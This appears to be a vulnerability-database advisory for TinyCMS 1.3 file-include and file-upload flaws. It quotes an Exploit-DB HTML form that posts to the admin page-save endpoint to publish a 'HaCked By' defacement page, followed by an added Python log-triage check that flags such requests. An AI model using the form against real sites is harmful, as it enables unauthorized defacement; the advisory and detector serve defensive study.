Vendor: TinyCMS
By: SecurityFocus
CVSS: 7.5 (HIGH)
Title: Local File-Include Vulnerabilities and Arbitrary File-Upload Vulnerability
CWE: 94
Product Name: TinyCMS
Affected Version From: TinyCMS 1.3
Affected Version To: TinyCMS 1.3
Patch Exists: YES
2012

TinyCMS Multiple Vulnerabilities

TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

Mitigation:

Users should ensure that the application is kept up to date with the latest security patches and that all user input is validated and sanitized.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/53761/info

TinyCMS 1.3 is vulnerable; other versions may also be affected. 

<form action='http://www.example.com/inc/functions.php?view=admin&do=pages&create=new&save=1' method='post'>
<strong>Page Title :</strong>
<input type="text" name="title" size="50" value='Happy Milw0rm 1337day !'>
<textarea id="elm1" name="page">
<center>
<h1> HaCked By KedAns-Dz </h1>
<h2> Happy Milw0rm 1337-Day All Hax0rS ^.^ </h2>
<h3> Greetings t0 KeyStr0ke + JF and All 0ld School ( The Milw0rm ) </h3>
</center>
</textarea>
<input type='submit' value='Upload Page'>
</form>
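
A log-triage check for the request the form above produces, added here as an example and not part of the original advisory: it flags POSTs to `inc/functions.php` carrying `view=admin` and `save=1` whose Referer is missing or points at another host, which is what a stand-alone form like this one generates. The combined log format, the `site_host` parameter and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)
TARGET = "/inc/functions.php"  # script named in the advisory's form action


def check_line(line, site_host):
    """Return a finding dict for a suspicious admin page-save POST, else None."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    url = urlsplit(m["url"])
    if not url.path.lower().endswith(TARGET):
        return None
    q = {k.lower(): v[0].lower() for k, v in parse_qs(url.query).items()}
    if q.get("view") != "admin" or q.get("save") != "1":
        return None
    ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
    if ref_host == site_host.lower():
        return None  # submitted from a page on the site itself
    reason = "no-referer" if ref_host is None else "cross-site-referer"
    return {"ip": m["ip"], "action": q.get("do", ""),
            "status": int(m["status"]), "reason": reason}


# Constructed sample lines: documentation-range IPs, placeholder hostnames.
SAMPLE = [
    '203.0.113.7 - - [01/Jun/2012:10:00:00 +0000] "POST /inc/functions.php?view=admin&do=pages&create=new&save=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jun/2012:10:02:00 +0000] "POST /inc/functions.php?view=admin&do=pages&create=new&save=1 HTTP/1.1" 200 512 "http://www.example.com/index.php?view=admin" "Mozilla/5.0"',
    '203.0.113.8 - - [01/Jun/2012:10:03:00 +0000] "POST /inc/functions.php?view=admin&do=pages&create=new&save=1 HTTP/1.1" 200 512 "http://other.invalid/form.html" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jun/2012:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def scan(lines, site_host="www.example.com"):
    """Run check_line over an iterable of log lines and keep the findings."""
    return [f for f in (check_line(l, site_host) for l in lines) if f]
```

The Referer header is client-supplied, so a hit is a triage signal for reviewing what the request created, not proof either way.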